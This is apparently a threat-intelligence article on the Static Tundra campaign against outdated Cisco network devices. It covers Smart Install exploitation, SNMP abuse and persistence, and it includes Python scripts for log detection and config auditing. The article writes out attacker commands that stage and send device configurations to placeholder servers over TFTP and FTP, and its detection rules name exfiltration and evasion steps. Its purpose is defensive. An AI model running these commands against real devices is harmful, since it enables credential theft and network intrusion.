How Russian hackers break into outdated network equipment

01.11.2025 (Updated 06.05.2026). 11-minute read. Author: Cyber Witcher

The article reveals the mechanics of Static Tundra attacks — how attackers exploit known vulnerabilities and unprotected, end-of-life devices to gain covert and long-term access to networks. Readers will learn about the main penetration vectors, typical signs of compromise in logs and traffic, and the tools used by attackers to steal configurations and intercept traffic.

Actor and Campaign Overview

Static Tundra is believed to be a Russian state-sponsored cyber-espionage group that focuses on hacking network equipment to infiltrate systems for extended periods of time and gain access to structures critical to Russian government interests. Static Tundra is likely a sub-cluster of another group, “Energetic Bear” (also known as BERSERK BEAR), based on common tactics, techniques, and procedures (TTPs) and victimology that have been confirmed by the FBI. Energetic Bear was linked to the Center 16 unit of the Russian Federal Security Service (FSB) in a 2022 indictment by the U.S. Department of Justice. There is reason to believe that Static Tundra is linked to the historical use of “SYNful Knock,” a malicious implant installed on compromised Cisco devices, which was publicly reported in 2015.

Static Tundra is considered a highly skilled cyber group that has been operating for over a decade and has conducted long-term espionage operations. Static Tundra specializes in network intrusions, as evidenced by the group’s deep knowledge of network devices and the use of specialized tools, possibly including the decade-old SYNful Knock router implant.

Static Tundra targets unpatched and often end-of-life network devices to gain access to primary targets and support secondary operations against associated targets of interest. After establishing initial access to a network device, Static Tundra penetrates deeper into the target environment, compromising additional network devices and establishing channels for long-term persistence and intelligence collection. This is demonstrated by the group’s ability to maintain access to target environments for several years without being detected.

For years, Static Tundra has compromised Cisco devices by exploiting a previously discovered vulnerability in the Smart Install feature of Cisco IOS and Cisco IOS XE software (CVE-2018-0171), which has remained unpatched on many devices, often because they have reached end of life. The goal of this campaign is to extract device configuration data in bulk, which can then be used as needed to further the strategic goals and interests of the Russian government. This is evidenced by Static Tundra’s adaptation of its operations and changing its operational focus in line with evolving priorities.

Since its initial detection in 2015, Static Tundra has targeted organizations in the telecommunications, higher education, and manufacturing sectors. Victims are primarily located in Ukraine and allied countries, but also include other organizations around the world. Static Tundra is likely to continue operating against networks of organizations that are strategically important to Russian interests, particularly in the manufacturing and higher education sectors. The political target, as before, will remain Ukraine and the countries that support it.

Targeting and Victimology

Static Tundra has been observed to primarily target organizations in the telecommunications, higher education, and manufacturing sectors, shifting over time in line with changes in Russia’s strategic interests. Known victims span multiple geographic regions, including North America, Asia, Africa, and Europe.

With the start of the full-scale war against Ukraine, Static Tundra’s activity has increased dramatically, with the group ramping up operations against Ukrainian entities and maintaining a high level of attacks to this day. While previously more selective and limited activity was observed, compromises of organizations across sectors are now being recorded, indicating a significant expansion of targets.

Tactics, Techniques, and Procedures (TTPs)

Static Tundra’s two key operational objectives are: first, to compromise network devices and extract sensitive configurations that can be used to prepare future operations; second, to establish permanent covert access to networks for long-term espionage, consistent with Russia’s strategic interests. Due to the widespread presence of Cisco infrastructure, the emphasis is on exploiting such devices and applying special tools aimed at persistence and stealth on outdated or non-updated network devices.

Initial Access

Since at least 2021, Static Tundra has aggressively exploited CVE-2018-0171, a known and patched vulnerability in Cisco IOS and Cisco IOS XE software that could allow an unauthenticated remote attacker to reload an affected device, causing a denial of service (DoS), or execute arbitrary code on the affected device.

Cisco released a patch for CVE-2018-0171 in 2018. As previously reported by Cisco, customers are strongly encouraged to install the patch immediately, given the active and persistent exploitation of this vulnerability by sophisticated state-sponsored Advanced Persistent Threat (APT) groups. Devices that have reached the end of their service life and cannot support the patch require additional security measures, as outlined in the 2018 Security Advisory. Unpatched devices with Smart Install enabled will remain vulnerable to these and other attacks until customers take action.

Static Tundra is believed to be using specially designed tools to automate the exploitation of CVE-2018-0171 and then download configurations from a pre-selected set of target IP addresses, likely collected through public scanning services (such as Shodan or Censys). The process is similar to those publicly reported in red team blogs and similar publications.

After gaining initial access through the Smart Install vulnerability, Static Tundra’s CVE-2018-0171 attack chain continues by issuing a command that modifies the running configuration and enables the local Trivial File Transfer Protocol (TFTP) server:

tftp-server nvram:startup-config

This allows Static Tundra to establish a subsequent connection to the newly created TFTP server to retrieve the startup configuration. The extracted configuration may reveal credentials and/or SNMP (Simple Network Management Protocol) community strings, which can then be used to more directly access the system.

Static Tundra has also been observed to gain initial access to devices via SNMP using a community string that was either compromised in a previous attack or guessed. In some cases, the group used unsecured community strings of “anonymous” and “public” with read and write permissions.

Execution

After gaining initial access to the target environment, Static Tundra interacts with the SNMP service using community strings that were compromised during the initial access phase. In some cases, Static Tundra spoofs the source address of SNMP traffic. This method allows an attacker to obfuscate their infrastructure and bypass access control lists (ACLs), because SNMP (carried over UDP) involves no session establishment. SNMP offers a variety of further execution options on a compromised device, such as executing commands directly, modifying the running configuration, and removing the current running configuration or startup configuration.

Static Tundra uses SNMP to send instructions to download a text file from a remote server and merge it into the running configuration. This can provide additional means of access through newly created local user accounts in conjunction with enabling remote services, including Telnet.

Persistence

Due to the relatively static nature of network environments, Static Tundra often relies on compromised SNMP community strings and credentials to maintain access to systems for several years. In some cases, Static Tundra creates privileged local user accounts and/or additional SNMP community strings for read and write.

Static Tundra has been observed using a Cisco IOS firmware implant known as SYNful Knock to gain persistent access to compromised systems. SYNful Knock is a modular implant that attackers inject into a Cisco IOS image and then load onto a compromised device. This provides a stealthy means of access that persists across reboots. Remote access to the device can be gained by sending a specially crafted TCP SYN packet, commonly referred to as a “magic packet.” More information, including a full technical description, can be found in a 2015 blog post published by Mandiant, with additional details from a 2015 Cisco blog post.

Defense Evasion

Static Tundra has been observed modifying the TACACS+ configuration on compromised devices, disabling remote logging. Static Tundra also modifies access control lists (ACLs) to allow access from specific IP addresses or ranges under its control.

Discovery

Static Tundra likely uses publicly available scan data from services such as Shodan or Censys to identify systems of interest. Once in a target environment, Static Tundra relies heavily on the device’s built-in commands, such as “show cdp neighbors”, to discover additional systems of interest in the target environment. This offers a relatively stealthy way to identify additional targets without the need for active scanning.

Collection

One of Static Tundra’s primary actions on targets is to capture network traffic that may be valuable from an intelligence perspective. To achieve this goal, Static Tundra establishes Generic Routing Encapsulation (GRE) tunnels that redirect traffic of interest to an attacker-controlled infrastructure, which can then be captured and further analyzed. Static Tundra has also been observed to collect and extract NetFlow data on compromised systems, revealing information about the source and destination of flows that may be of interest.

Exfiltration

Static Tundra extracts configuration information in a variety of ways, including inbound TFTP connections via the Smart Install exploit procedure mentioned in the “Initial Access” section, outbound TFTP or FTP connections from a compromised device to an attacker-controlled infrastructure, and inbound SNMP connections via the configuration copy process.

Static Tundra uses custom SNMP tooling and the functionality provided by the CISCO-CONFIG-COPY-MIB to extract configurations from compromised devices via TFTP or Remote Copy Protocol (RCP).

Static Tundra has been observed using the following commands to extract configuration files via TFTP and FTP:

show startup-config | redirect tftp://<server>:/conf_bckp
copy running-config ftp://<user>:<password>@<server>/output.txt

Detection

It is recommended to implement a set of measures to detect suspicious activity that may indicate the involvement of devices in this campaign:

  • Implement comprehensive configuration management (including auditing) according to best practices.

  • Conduct comprehensive monitoring of authentication, authorization, and command issuance.

  • Monitor syslog and AAA logs for unusual activity, including a decrease in normal logging events or gaps in logged activity.

  • Monitor your environment for unusual changes in behavior or configuration.

  • Profile network devices (NetFlow fingerprinting and port scanning) for changes in their exposed surface, including newly opened or closed ports and ingress/egress (non-transit) traffic.

  • Where possible, develop NetFlow visibility tools to detect unusual volume changes.

  • Look for non-empty or unusually large .bash_history files.

Additional identification and discovery can be performed using Cisco forensic guides.
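The detection measures above can be turned into a concrete log check. The following Python script is an added example and is not part of the original article or of any Cisco tooling. It parses a handful of constructed IOS-style syslog lines and flags the configuration changes this campaign is known for (a TFTP server exposing startup-config, new local users, added or default SNMP community strings, removed remote logging, GRE tunnels, changed NetFlow export targets), configuration sessions that originate outside an assumed management network, and long gaps in the log stream. It assumes the device has configuration-change logging enabled (IOS emits `%PARSER-5-CFGLOG_LOGGEDCMD` messages when `archive` / `log config` logging is turned on); the hostnames, addresses and log lines are constructed for the example.

```python
import ipaddress
import re
from datetime import datetime, timedelta
from typing import Dict, List

# Constructed sample syslog lines in IOS "service timestamps log datetime" style.
# They are not real captures; the addresses and hostnames are invented.
SAMPLE_SYSLOG = """\
Jan 12 09:00:01 edge-rtr1 %SYS-5-CONFIG_I: Configured from console by admin on vty0 (10.20.0.5)
Jan 12 09:00:02 edge-rtr1 %PARSER-5-CFGLOG_LOGGEDCMD: User:admin  logged command:interface GigabitEthernet0/1
Jan 12 09:03:10 edge-rtr1 %SYS-5-CONFIG_I: Configured from console by vty1 (198.51.100.23)
Jan 12 09:03:12 edge-rtr1 %PARSER-5-CFGLOG_LOGGEDCMD: User:admin  logged command:tftp-server nvram:startup-config
Jan 12 09:03:40 edge-rtr1 %PARSER-5-CFGLOG_LOGGEDCMD: User:admin  logged command:username svc_backup privilege 15 secret 5 $1$abcd$constructed
Jan 12 09:03:55 edge-rtr1 %PARSER-5-CFGLOG_LOGGEDCMD: User:admin  logged command:snmp-server community anonymous RW
Jan 12 09:04:10 edge-rtr1 %PARSER-5-CFGLOG_LOGGEDCMD: User:admin  logged command:no logging host 10.20.0.50
Jan 12 09:04:30 edge-rtr1 %PARSER-5-CFGLOG_LOGGEDCMD: User:admin  logged command:tunnel mode gre ip
Jan 12 09:04:31 edge-rtr1 %PARSER-5-CFGLOG_LOGGEDCMD: User:admin  logged command:tunnel destination 198.51.100.23
Jan 12 15:30:00 edge-rtr1 %SYS-5-CONFIG_I: Configured from console by admin on vty0 (10.20.0.5)
"""

LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2}\s+\d{2}:\d{2}:\d{2})\s+"
    r"(?P<host>\S+)\s+(?P<mnemonic>%[A-Z0-9_]+-\d-[A-Z0-9_]+):\s*(?P<msg>.*)$"
)
CONFIG_SRC_RE = re.compile(r"\((?P<ip>\d+\.\d+\.\d+\.\d+)\)\s*$")
CMD_RE = re.compile(r"logged command:(?P<cmd>.*)$")

# Each rule maps a configuration command pattern to the campaign behaviour it indicates.
COMMAND_RULES = [
    ("TFTP server exposing startup-config (exfiltration staging)", re.compile(r"^tftp-server\s+nvram:startup-config")),
    ("local user account created (persistence)", re.compile(r"^username\s+\S+")),
    ("SNMP community string added (persistence)", re.compile(r"^snmp-server\s+community\s+\S+")),
    ("default or guessable SNMP community string", re.compile(r"^snmp-server\s+community\s+(public|private|anonymous)\b", re.I)),
    ("remote logging or AAA removed (defense evasion)", re.compile(r"^no\s+(logging\s+host|logging|tacacs|aaa)\b")),
    ("access-list modified (defense evasion)", re.compile(r"^(ip\s+)?access-list\b")),
    ("GRE tunnel configured (collection)", re.compile(r"^tunnel\s+(mode\s+gre|destination)\b")),
    ("NetFlow export destination changed (collection)", re.compile(r"^ip\s+flow-export\s+destination\b")),
]


def parse_syslog(text: str) -> List[Dict]:
    """Split syslog text into events; lines that do not look like IOS messages are skipped."""
    events = []
    for raw in text.splitlines():
        m = LINE_RE.match(raw)
        if not m:
            continue
        ev = m.groupdict()
        # IOS timestamps carry no year; the parsed year is irrelevant for gap arithmetic.
        ev["when"] = datetime.strptime(ev["ts"], "%b %d %H:%M:%S")
        ev["raw"] = raw
        events.append(ev)
    return events


def scan_events(events: List[Dict], mgmt_nets: List[str], max_gap: timedelta = timedelta(hours=4)) -> List[Dict]:
    """Return findings: suspicious commands, config sessions from outside mgmt_nets, and log gaps."""
    nets = [ipaddress.ip_network(n) for n in mgmt_nets]
    findings, prev = [], None
    for ev in events:  # events are assumed to be in chronological order
        if prev is not None and ev["when"] - prev["when"] > max_gap:
            findings.append({"rule": "logging gap (possible disabled or suppressed logging)",
                             "detail": f"{ev['when'] - prev['when']} with no events", "raw": ev["raw"]})
        prev = ev
        if ev["mnemonic"] == "%SYS-5-CONFIG_I":
            m = CONFIG_SRC_RE.search(ev["msg"])
            if m and not any(ipaddress.ip_address(m.group("ip")) in n for n in nets):
                findings.append({"rule": "configuration session from outside management network",
                                 "detail": m.group("ip"), "raw": ev["raw"]})
        elif ev["mnemonic"] == "%PARSER-5-CFGLOG_LOGGEDCMD":
            m = CMD_RE.search(ev["msg"])
            if m:
                cmd = m.group("cmd").strip()
                for name, pat in COMMAND_RULES:
                    if pat.search(cmd):
                        findings.append({"rule": name, "detail": cmd, "raw": ev["raw"]})
    return findings


if __name__ == "__main__":
    for f in scan_events(parse_syslog(SAMPLE_SYSLOG), ["10.20.0.0/24"]):
        print(f"[{f['rule']}] {f['detail']}")
```

Feed the script your own syslog export and management prefixes; the rule table is deliberately small and should be extended with whatever a change-management process says is never done interactively on your devices. The gap check is crude (it only compares consecutive events), but it catches the "decrease in normal logging events" symptom the list above describes.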

Preventive measures

The following strong recommendations apply to businesses in all sectors.

Cisco-specific measures

  • Install the patch for CVE-2018-0171. Disable Smart Install as outlined in the advisory if patching is not possible.

  • Use the Cisco Hardening Guides when configuring devices.

  • Disable Telnet and ensure that it is not available on any Virtual Teletype (VTY) line on Cisco devices by configuring all VTY lines with the “transport input ssh” and “transport output none” options.

  • Disable the Cisco Smart Install service with the “no vstack” command on any device that cannot apply the available patch for CVE-2018-0171, and develop end-of-life management plans for technologies that are too old to be patched.

  • Use type 8 passwords for local credentials.

  • Use type 6 for TACACS+ key configuration.
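The Cisco-specific measures above are all visible in a device's running configuration, so they can be audited offline. The following Python script is an added example, not code from the original article or from Cisco; it checks a running-config text for the weak settings the list names (Smart Install not disabled, Telnet on VTY lines, local credentials that are not type 8 or 9, default or read-write SNMP community strings, a TACACS+ key that is not type 6, plain HTTP management) and is run against two constructed config excerpts, one weak and one hardened. The hostnames, hashes and addresses in the samples are invented, and the audit assumes the common IOS convention that Smart Install is off only when `no vstack` appears in the configuration.

```python
import re
from typing import Iterator, List, Tuple

DEFAULT_COMMUNITIES = {"public", "private", "anonymous"}

# Constructed weak running-config excerpt (invented names, hashes and addresses).
WEAK_CONFIG = """\
hostname edge-rtr1
!
username admin privilege 15 secret 5 $1$XyZ1$constructedhash
username ops privilege 15 password 7 0822455D0A16
!
snmp-server community public RO
snmp-server community anonymous RW
!
tacacs server ISE
 address ipv4 10.20.0.40
 key 7 094F471A1A0A
!
ip http server
no ip http secure-server
!
line vty 0 4
 transport input telnet ssh
 transport output none
line vty 5 15
 transport input ssh
!
end
"""

# The same device after applying the recommendations above (also constructed).
HARDENED_CONFIG = """\
hostname edge-rtr1
!
no vstack
!
username admin privilege 15 secret 8 $8$constructedhash
!
snmp-server group NETMON v3 priv
snmp-server user netmon NETMON v3 auth sha constructedauth priv aes 128 constructedpriv
!
tacacs server ISE
 address ipv4 10.20.0.40
 key 6 constructedencryptedkey
!
no ip http server
ip http secure-server
!
line vty 0 15
 transport input ssh
 transport output none
!
end
"""


def _blocks(config: str, prefix: str) -> Iterator[Tuple[str, List[str]]]:
    """Yield (header, indented child lines) for every top-level stanza starting with prefix."""
    header, children = None, []
    for line in config.splitlines() + ["!"]:
        if line.startswith(" ") and header is not None:
            children.append(line.strip())
            continue
        if header is not None:
            yield header, children
            header, children = None, []
        if line.startswith(prefix):
            header, children = line.strip(), []


def audit_config(config: str) -> List[str]:
    """Return human-readable findings for each weak setting found in an IOS running-config."""
    findings = []
    lines = [l.rstrip() for l in config.splitlines()]
    if not any(l.strip() == "no vstack" for l in lines):
        findings.append("Smart Install not explicitly disabled: add 'no vstack' or patch CVE-2018-0171")
    for l in lines:
        m = re.match(r"^username\s+(\S+).*?\b(secret|password)\s+(\d)\b", l)
        if m and not (m.group(2) == "secret" and m.group(3) in ("8", "9")):
            findings.append(f"local user '{m.group(1)}' uses {m.group(2)} type {m.group(3)}: use type 8")
        m = re.match(r"^snmp-server\s+community\s+(\S+)(?:\s+(RO|RW))?", l, re.I)
        if m:
            name, mode = m.group(1), (m.group(2) or "RO").upper()
            if name.lower() in DEFAULT_COMMUNITIES:
                findings.append(f"SNMP community '{name}' is a default or guessable string")
            if mode == "RW":
                findings.append(f"SNMP community '{name}' has write access")
        if re.match(r"^ip\s+http\s+server\b", l):
            findings.append("unencrypted HTTP management enabled: use 'no ip http server'")
    for header, children in _blocks(config, "tacacs server"):
        for c in children:
            m = re.match(r"^key\s+(?:(\d)\s+)?\S+", c)
            if m and (m.group(1) or "0") != "6":
                findings.append(f"{header}: key stored as type {m.group(1) or '0'}: use type 6")
    for header, children in _blocks(config, "line vty"):
        inputs = [c for c in children if c.startswith("transport input")]
        outputs = [c for c in children if c.startswith("transport output")]
        if not inputs or any("telnet" in c.split() or "all" in c.split() for c in inputs):
            findings.append(f"{header}: Telnet permitted or transport input unset: set 'transport input ssh'")
        if not any(c == "transport output none" for c in outputs):
            findings.append(f"{header}: set 'transport output none'")
    return findings


if __name__ == "__main__":
    for cfg_name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(f"{cfg_name}: {len(audit_config(cfg))} finding(s)")
        for f in audit_config(cfg):
            print("  -", f)
```

Running the audit against configurations pulled from a central repository (rather than from the devices themselves, as the "General measures" below advise) turns the checklist into a repeatable control; the hardened sample produces no findings, while the weak one reports every item in the list.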

General measures

  • Strictly adhere to security best practices, including updates, access control, user education, and network segmentation.

  • Stay up-to-date with U.S. government and industry security advisories and consider suggested configuration changes to mitigate the issues described.

  • Update devices as aggressively as possible. This includes updating current hardware and software to address known vulnerabilities and replacing hardware and software that has reached the end of its useful life. Choose strong passwords and community strings, and avoid default credentials.

  • Use multi-factor authentication (MFA).

  • Encrypt all monitoring and configuration traffic (e.g., SNMPv3, HTTPS, SSH, NETCONF, RESTCONF).

  • Lock down and closely monitor credential systems such as TACACS+ and any transit hosts.

  • Use AAA to prohibit configuration changes to key device security (e.g., local accounts, TACACS+, RADIUS).

  • Prevent and monitor exposure of administrative or unusual interfaces (e.g. SNMP, SSH, HTTP, HTTPS).

  • Disable all unencrypted web management capabilities.

  • Verify the existence and correctness of access control lists for all management protocols (e.g. SNMP, SSH, NETCONF).

  • Centrally store configurations and push them to devices. DO NOT treat devices as the authoritative source of truth for their own configurations.

Indicators of Compromise (IoCs)

Conclusion

The article examines in detail a long-running cyberespionage campaign associated with a group known as Static Tundra, which specializes in compromising network equipment (particularly Cisco devices) for the purpose of long-term covert access and collection of configuration and network data. The group’s key tactics and tools are described — exploitation of the Smart Install vulnerability (CVE-2018-0171), use of SNMP and TFTP to extract configurations, implementation of persistent access mechanisms (including the SYNful Knock implant), and methods of hiding traces by changing ACLs and logging settings. The victimology of attacks is also analyzed (mainly telecom, education, manufacturing, focus on Ukraine and its partners), and practical recommendations for detecting, preventing, and restoring the security of network devices are provided at the end.
